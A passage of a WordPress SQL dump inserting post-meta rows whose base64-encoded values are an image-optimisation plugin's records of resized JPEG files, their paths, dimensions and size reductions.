HRlcnN0b2NrXzM4NDc3MTQtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg0NzcxNC03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MTQ0NCwidGltZSI6MTQ4MzU4Mjg4MSwiaWQiOjc1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg0NzcxNC0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg0NzcxNC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NDc3MTQtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6NDM3OSwidGltZSI6MTQ4MzU4Mjg4NiwiaWQiOjc1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg0NzcxNC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODQ3NzE0LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NDc3MTQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjYwMiwidGltZSI6MTQ4MzU4Mjg4OSwiaWQiOjc1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg0NzcxNC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODQ3NzE0LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NDc3MTQtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ2NSwidGltZSI6MTQ4MzU4Mjg5MywiaWQiOjc1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg0NzcxNC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODQ3NzE0LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NDc3MTQtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjUwOCwidGltZSI6MTQ4MzU4Mjg5NiwiaWQiOjc1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg0NzcxNC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODQ3NzE0LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NDc3MTQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEyNTYsInRpbWUiOjE0ODM1ODI5MDAsImlkIjo3NTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg0NzcxNC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODQ3NzE0LTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NDc3MTQtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjQyMCwidGltZSI6MTQ4MzU4MjkwMywiaWQiOjc1MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODQ3NzE0LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NDc3MTQtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg0NzcxNC0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NDcyLCJ0aW1lIjoxNDgzNTgyOTA3LCJpZCI6NzUxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NDc3MTQtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg0NzcxNC0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODQ3NzE0LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo2MjYsInRpbWUiOjE0ODM1ODI5MTAsImlkIjo3NTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg0NzcxNC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODQ3NzE0LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NDc3MTQtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjcxMywidGltZSI6MTQ4MzU4MjkxNCwiaWQiOjc1MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODQ3NzE0LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NDc3MTQtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg0NzcxNC00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6ODIwLCJ0aW1lIjoxNDgzNTgyOTE4LCJpZCI6NzUxfV0='); 
INSERT INTO `wp_postmeta` VALUES (30029, 750, 'wpfc_optimisation_reduction', '1066754'); 
INSERT INTO `wp_postmeta` VALUES (30030, 750, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1NaWxsZXItU3RlcGhlbnNvbi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tTWlsbGVyLVN0ZXBoZW5zb24uanBnIiwid2lkdGgiOjM1MDAsImhlaWdodCI6NTAwMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tTWlsbGVyLVN0ZXBoZW5zb24uanBnIiwicmVkdWN0aW9uIjoxMDY2NjY0LCJ0aW1lIjoxNDgzNTgyOTI4LCJpZCI6Ijc1MCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1NaWxsZXItU3RlcGhlbnNvbi0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tTWlsbGVyLVN0ZXBoZW5zb24tMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLU1pbGxlci1TdGVwaGVuc29uLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyOTMxLCJpZCI6NzUwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tTWlsbGVyLVN0ZXBoZW5zb24tNTYweDgwMC5qcGciLCJ3aWR0aCI6NTYwLCJoZWlnaHQiOjgwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLU1pbGxlci1TdGVwaGVuc29uLTU2MHg4MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi1NaWxsZXItU3RlcGhlbnNvbi01NjB4ODAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MjkzNCwiaWQiOjc1MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLU1pbGxlci1TdGVwaGVuc29uLTc2OHgxMDk3LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6MTA5NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLU1pbGxlci1TdGVwaGVuc29uLTc2OHgxMDk3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tTWlsbGVyLVN0ZXBoZW5zb24tNzY4eDEwOTcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyOTM3LCJpZCI6NzUwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tTWlsbGVyLVN0ZXBoZW5zb24tMTEyMHgxNjAwLmpwZyIsIndpZHRoIjoxMTIwLCJoZWlnaHQiOjE2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1NaWxsZXItU3RlcGhlbnNvbi0xMTIweDE2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi1NaWxsZXItU3RlcGhlbnNvbi0xMTIweDE2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyOTQxLCJpZCI6NzUwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tTWlsbGVyLVN0ZXBoZW5zb24tMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLU1pbGxlci1TdGVwaGVuc29uLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi1NaWxsZXItU3RlcGhlbnNvbi0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4Mjk0MywiaWQiOjc1MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLU1pbGxlci1TdGVwaGVuc29uLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1NaWxsZXItU3RlcGhlbnNvbi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tTWlsbGVyLVN0ZXBoZW5zb24tMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODI5NDYsImlkIjo3NTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1NaWxsZXItU3RlcGhlbnNvbi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tTWlsbGVyLVN0ZXBoZW5zb24tMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLU1pbGxlci1TdGVwaGVuc29uLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyOTQ5LCJpZCI6NzUwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tTWlsbGVyLVN0ZXBoZW5zb24tNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLU1pbGxlci1TdGVwaGVuc29uLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi1NaWxsZXItU3RlcGhlbnNvbi01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4Mjk1MSwiaWQiOjc1MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tTWlsbGVyLVN0ZXBoZW5zb24tMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLU1pbGxlci1TdGVwaGVuc29uLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi1NaWxsZXItU3RlcGhlbnNvbi0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NzgsInRpbWUiOjE0ODM1ODI5NTQsImlkIjo3NTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLU1pbGxlci1TdGVwaGVuc29uLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1NaWxsZXItU3RlcGhlbnNvbi0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tTWlsbGVyLVN0ZXBoZW5zb24tMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODI5NTcsImlkIjo3NTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLU1pbGxlci1TdGVwaGVuc29uLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1NaWxsZXItU3RlcGhlbnNvbi0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tTWlsbGVyLVN0ZXBoZW5zb24tMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODI5NjAsImlkIjo3NTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLU1pbGxlci1TdGVwaGVuc29uLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1NaWxsZXItU3RlcGhlbnNvbi0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tTWlsbGVyLVN0ZXBoZW5zb24tMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODI5NjIsImlkIjo3NTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLU1pbGxlci1TdGVwaGVuc29uLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1NaWxsZXItU3RlcGhlbnNvbi00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tTWlsbGVyLVN0ZXBoZW5zb24tNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODI5NjUsImlkIjo3NTB9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30031, 749, 'wpfc_optimisation_reduction', '8619'); 
INSERT INTO `wp_postmeta` VALUES (30032, 749, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQzOTU2MDk3My5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180Mzk1NjA5NzMuanBnIiwid2lkdGgiOjUyMDAsImhlaWdodCI6MzI1MCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4Mjk3MCwiaWQiOiI3NDkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180Mzk1NjA5NzMtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDM5NTYwOTczLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2